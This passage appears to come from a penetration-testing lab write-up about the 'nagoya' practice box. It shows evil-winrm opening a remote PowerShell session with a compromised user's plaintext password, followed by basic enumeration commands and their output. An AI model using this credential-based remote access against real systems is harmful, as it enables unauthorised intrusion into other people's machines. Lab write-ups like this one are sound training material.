WinRM
Now that I have compromised the christopher.lewis user who is part of the Remote Management Users group, I can establish a WinRM session to the target system.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ evil-winrm -i nagoya.nagoya-industries.com -u christopher.lewis -p Qwer1234
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami
nagoya-ind\christopher.lewis
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> hostname
nagoya
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.158.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.158.254Initial Foothold established to the target system as the christopher.lewis user via WinRM